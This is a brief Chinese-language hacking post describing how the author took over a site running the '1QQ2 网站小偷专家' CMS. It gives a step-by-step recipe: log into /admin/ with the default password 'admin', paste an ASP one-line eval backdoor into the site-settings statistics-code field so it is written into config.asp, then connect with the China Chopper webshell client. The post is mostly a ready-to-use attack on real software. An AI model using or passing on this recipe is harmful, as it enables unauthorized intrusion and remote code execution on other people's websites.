刚遇到个站,admin进后台,看到是1QQ2网站小偷专家
后台看看了,貌似没利用的地方,就想到和昨晚遇到的一个站差不多。
思路是这样的:插一句话到配置文件,然后举起菜刀连接这个配置文件。
官网下了个源码,看到config.asp,是在根目录的,而我们的后台是/admin/
这里要注意的是插的一句话,要把前面的%>闭合,再插一句话,再把后面的%>闭合
因此,一句话应该是%><%eval request("bluenoob")%><%
步骤:
- 网址后加admin,出现后台登陆界面 eg: https://www.bluenoob.com/admin/
- 默认后台登陆密码 admin
- 在站点设置那里,随便找个地方插一句话,我是插在统计代码里的,插的代码为: %><%eval request("bluenoob")%><%
- 菜刀举起,连接地址为 https://www.bluenoob.com/config.asp ,密码为 bluenoob
哦了,webshell到手。
诗人比较懒,就不截图了。
会员登录关闭
注册会员关闭